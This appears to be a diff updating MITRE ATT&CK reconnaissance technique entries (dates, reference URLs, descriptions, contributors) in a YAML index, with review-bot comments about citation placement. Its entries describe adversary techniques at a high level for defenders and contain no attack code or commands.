description: |-
Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -55628,15 +56294,38 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+ created: '2020-10-02T16:50:12.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1593/002
+ external_id: T1593.002
+ - source_name: SecurityTrails Google Hacking
+ description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+ - source_name: ExploitDB GoogleHacking
+ description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+ October 23, 2020.
+ url: https://www.exploit-db.com/google-hacking-database
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.002:
technique:
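Review bot: the re-added reference still named `SecurityTrails Google Hacking` now points at a recordedfuture.com URL with a new retrieval date (September 12, 2024), so the `(Citation: SecurityTrails Google Hacking)` key in the description still resolves but the source name no longer matches the host. If this follows upstream ATT&CK verbatim it can stay as is; otherwise an archive.org capture of the original securitytrails.com post would be consistent with how the OPM and ACSC references are handled elsewhere in this patch. The same renamed-source change recurs in the T1593 hunk further down.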
@@ -55658,7 +56347,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:36:58.964Z'
name: Business Relationships
description: |-
Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -55674,8 +56363,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.003:
technique:
@@ -55736,29 +56423,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1589.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
- type: attack-pattern
- created: '2020-10-02T14:57:15.906Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1589.003
- url: https://attack.mitre.org/techniques/T1589/003
- - source_name: OPM Leak
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:09:45.795Z'
name: Employee Names
description: |-
Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -55767,15 +56435,34 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+ created: '2020-10-02T14:57:15.906Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1589/003
+ external_id: T1589.003
+ - source_name: OPM Leak
+ description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.004:
technique:
@@ -55801,7 +56488,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:35:09.668Z'
name: Client Configurations
description: |-
Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -55819,47 +56506,10 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Philip Winther
- - Sebastian Salla, McAfee
- - Robert Simmons, @MalwareUtkonos
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
- type: attack-pattern
- created: '2020-10-02T17:08:57.386Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1598.002
- url: https://attack.mitre.org/techniques/T1598/002
- - source_name: Sophos Attachment
- url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
- description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
- links – when phishers bring along their own web pages. Retrieved October
- 20, 2020.'
- - source_name: GitHub Phishery
- url: https://github.com/ryhanson/phishery
- description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
- 23, 2020.
- - source_name: Microsoft Anti Spoofing
- url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
- description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
- Retrieved October 19, 2020.
- - source_name: ACSC Email Spoofing
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- description: Australian Cyber Security Centre. (2012, December). Mitigating
- Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-05-31T04:18:44.568Z'
name: Spearphishing Attachment
description: |-
Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -55868,19 +56518,55 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Philip Winther
+ - Sebastian Salla, McAfee
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
accounts receiving messages from a single unusual/unknown sender. Filtering
based on DKIM+SPF or header analysis can help detect when the email sender
is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+ created: '2020-10-02T17:08:57.386Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1598/002
+ external_id: T1598.002
+ - source_name: ACSC Email Spoofing
+ description: Australian Cyber Security Centre. (2012, December). Mitigating
+ Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: Sophos Attachment
+ description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+ links – when phishers bring along their own web pages. Retrieved October
+ 20, 2020.'
+ url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+ - source_name: Microsoft Anti Spoofing
+ description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+ Retrieved October 19, 2020.
+ url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+ - source_name: GitHub Phishery
+ description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+ 23, 2020.
+ url: https://github.com/ryhanson/phishery
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.004:
technique:
@@ -55903,7 +56589,7 @@ reconnaissance:
description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
You Can Do About It. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:47:55.905Z'
name: CDNs
description: |-
Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -55919,8 +56605,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591:
technique:
@@ -55946,7 +56630,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.343Z'
name: Gather Victim Org Information
description: |-
Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -55962,8 +56646,6 @@ reconnaissance:
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590:
technique:
@@ -55991,7 +56673,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:23.229Z'
name: Gather Victim Network Information
description: |-
Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -56007,12 +56689,10 @@ reconnaissance:
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593:
technique:
- modified: '2022-10-18T22:48:33.286Z'
+ modified: '2024-09-12T19:19:47.759Z'
name: Search Open Websites/Domains
description: |-
Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -56021,16 +56701,16 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -56043,8 +56723,8 @@ reconnaissance:
external_id: T1593
- source_name: SecurityTrails Google Hacking
description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- url: https://securitytrails.com/blog/google-hacking-techniques
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
- source_name: Cyware Social Media
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -56055,52 +56735,50 @@ reconnaissance:
url: https://www.exploit-db.com/google-hacking-database
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1597:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
- type: attack-pattern
- created: '2020-10-02T17:01:42.558Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1597
- url: https://attack.mitre.org/techniques/T1597
- - source_name: D3Secutrity CTI Feeds
- url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
- description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
- Intelligence Feeds. Retrieved October 20, 2020.
- - source_name: ZDNET Selling Data
- url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
- description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
- 73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-04T13:12:14.469Z'
name: Search Closed Sources
description: |-
- Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+ Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Barbara Louis-Sidney (OWN-CERT)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
+ type: attack-pattern
+ id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+ created: '2020-10-02T17:01:42.558Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1597
+ external_id: T1597
+ - source_name: ZDNET Selling Data
+ description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+ 73 million user records on the dark web. Retrieved October 20, 2020.
+ url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1592.003:
technique:
@@ -56122,7 +56800,7 @@ reconnaissance:
url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
source code and proprietary data dumped online. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:22:46.759Z'
name: Firmware
description: |-
Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -56138,8 +56816,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.002:
technique:
@@ -56165,7 +56841,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:33:19.596Z'
name: Software
description: |-
Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -56183,8 +56859,6 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.001:
technique:
@@ -56206,7 +56880,7 @@ reconnaissance:
url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:52:40.958Z'
name: Social Media
description: |-
Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -56222,12 +56896,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.001:
technique:
- modified: '2023-04-14T23:29:10.396Z'
+ modified: '2024-10-10T13:45:01.069Z'
name: Credentials
description: "Adversaries may gather credentials that can be used during targeting.
Account credentials gathered by adversaries may be those directly associated
@@ -56237,17 +56909,20 @@ reconnaissance:
elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
Adversaries may also compromise sites then add malicious content designed
to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
- Credential information may also be exposed to adversaries via leaks to online
- or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
- breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
- Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
- GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
- may also purchase credentials from dark web or other black-markets. Finally,
- where multi-factor authentication (MFA) based on out-of-band communications
- is in use, adversaries may compromise a service provider to gain access to
- MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
- this information may reveal opportunities for other forms of reconnaissance
- (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+ (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+ Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+ GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+ based on out-of-band communications is in use, adversaries may compromise
+ a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+ Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+ adversaries via leaks to online or other accessible data sets (ex: [Search
+ Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+ repositories, etc.). Adversaries may purchase credentials from dark web markets,
+ such as Russian Market and 2easy, or through access to Telegram channels that
+ distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+ 2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+ Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+ for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
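Review bot: in the rewritten description, the citation group starting at `+ (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify` now directly follows the ScanBox sentence about collecting website authentication cookies, while the sentence those seven citations originally supported ("Credential information may also be exposed to adversaries via leaks to online or other accessible data sets ...") has moved two sentences later and carries no citations of its own. If this is verbatim upstream ATT&CK text, leave it, but check that the renderer does not present the GitHub/truffleHog/Gitrob sources as evidence for the cookie-theft claim; if the description is assembled locally, move the citation group back to the leaks sentence.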
@@ -56259,6 +56934,7 @@ reconnaissance:
- Vinayak Wadhwa, Lucideus
- Lee Christensen, SpecterOps
- Toby Kohlenberg
+ - Massimo Giaimo, Würth Group Cyber Defence Center
x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -56269,7 +56945,7 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
created: '2020-10-02T14:55:43.815Z'
@@ -56279,6 +56955,10 @@ reconnaissance:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1589/001
external_id: T1589.001
+ - source_name: Bleeping Computer 2easy 2021
+ description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+ web marketplace for stolen data. Retrieved October 7, 2024.
+ url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
- source_name: ATT ScanBox
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -56291,6 +56971,10 @@ reconnaissance:
description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
19, 2020.
url: https://github.com/dxa4481/truffleHog
+ - source_name: Bleeping Computer Stealer Logs 2023
+ description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+ Stealer Logs in Context. Retrieved October 10, 2024.'
+ url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
- source_name: Register Uber
description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -56313,6 +56997,10 @@ reconnaissance:
Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
October 19, 2020.
url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+ - source_name: SecureWorks Infostealers 2023
+ description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+ The Growing Threat from Infostealers. Retrieved October 10, 2024.
+ url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
- source_name: Register Deloitte
description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -56320,9 +57008,8 @@ reconnaissance:
url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.003:
technique:
@@ -56381,7 +57068,7 @@ reconnaissance:
adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
to access valuable information that can be exfiltrated or used to escalate
privileges and move laterally. "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -56401,7 +57088,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1591.004:
technique:
@@ -56423,7 +57109,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:39:08.904Z'
name: Identify Roles
description: |-
Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -56439,12 +57125,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598:
technique:
- modified: '2023-09-08T20:28:49.600Z'
+ modified: '2024-05-31T04:18:44.570Z'
name: Phishing for Information
description: "Adversaries may send phishing messages to elicit sensitive information
that can be used during targeting. Phishing for information is an attempt
@@ -56513,7 +57197,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
